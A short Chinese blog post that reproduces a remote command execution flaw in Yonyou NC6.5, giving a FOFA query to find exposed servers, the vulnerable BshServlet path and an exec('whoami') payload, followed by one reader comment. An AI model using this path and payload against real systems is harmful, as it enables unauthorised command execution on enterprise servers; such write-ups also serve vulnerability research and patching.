用友NC6.5 bsh.servlet.BshServlet 远程命令执行漏洞漏洞复现

noob
2021-08-07 / 1 评论 / 527 阅读 / 正在检测是否收录...

用友NC

用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。

fofa搜索

body="用友网络"

影响范围

用友NC6.5

漏洞复现

漏洞位置:xxx/servlet/~ic/bsh.servlet.BshServlet

执行命令:exec("whoami");


复现完成

13

评论 (1)

取消
  1. 头像
    qwe
    Windows 10 · Google Chrome

    n哥牛啊

    回复